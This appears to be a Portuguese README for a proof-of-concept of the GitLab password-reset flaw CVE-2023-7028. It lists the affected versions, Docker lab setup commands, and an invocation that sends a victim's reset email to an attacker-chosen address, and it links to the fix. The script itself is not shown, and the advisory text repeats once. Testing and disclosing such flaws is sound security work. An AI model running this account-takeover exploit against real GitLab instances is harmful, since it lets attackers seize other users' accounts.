
Um problema foi descoberto no GitLab CE/EE afetando todas as versões de 16.1 anteriores a 16.1.6, 16.2 anteriores a 16.2.9, 16.3 anteriores a 16.3.7, 16.4 anteriores a 16.4.5, 16.5 anteriores a 16.5.6, 16.6 anteriores a 16.6.4 e 16.7 anteriores a 16.7.2 em que emails de redefinição de senha de conta de usuário poderiam ser entregues a um endereço de email não verificado.
Um problema foi descoberto no GitLab CE/EE afetando todas as versões de 16.1 anteriores à 16.1.6, 16.2 anteriores à 16.2.9, 16.3 anteriores à 16.3.7, 16.4 anteriores à 16.4.5, 16.5 anteriores à 16.5.6, 16.6 anteriores à 16.6.4 e 16.7 anteriores à 16.7.2, em que os e-mails de redefinição de senha de contas de usuário poderiam ser entregues a um endereço de e-mail não verificado.
PoC testado no Kali 2023.3
#sudo docker pull gitlab/gitlab-ee:16.7.0-ee.0
#sudo docker run --detach --publish 8443:443 --publish 2222:22 --publish 8080:80 --name gitlab-container --restart always --volume $GITLAB_HOME/config:/etc/gitlab --volume $GITLAB_HOME/logs:/var/log/gitlab --volume $GITLAB_HOME/data:/var/opt/gitlab --shm-size 256m gitlab/gitlab-ee:16.7.0-ee.0
seja paciente, demora um pouco para iniciar!
configure o smtp no container gitlab https://docs.gitlab.com/omnibus/settings/smtp.html
Faça login no gitlab
#sudo docker exec -it gitlab-container grep "Password:" /etc/gitlab/initial_root_password Login/senha: root/resultado do grep acima


em seguida, crie um usuário com uma conta de e-mail válida e valide sua conta


execute o PoC
./cve-2023-7028.sh https://gitlab.site.com [email protected] [email protected]
resultado: um e-mail é enviado para o endereço de e-mail original E para o outro endereço de e-mail

Solução alternativa/Correção: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
mais sobre mim ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Aviso: IMPORTANTE: Este script é fornecido apenas para fins educacionais, testes éticos e uso legal. Não o utilize em qualquer sistema ou rede sem permissão explícita. O acesso não autorizado a sistemas e redes de computadores é ilegal, e usuários pegos realizando atividades não autorizadas estão sujeitos a ações legais. O autor NÃO é responsável por qualquer dano causado pelo uso indevido deste script.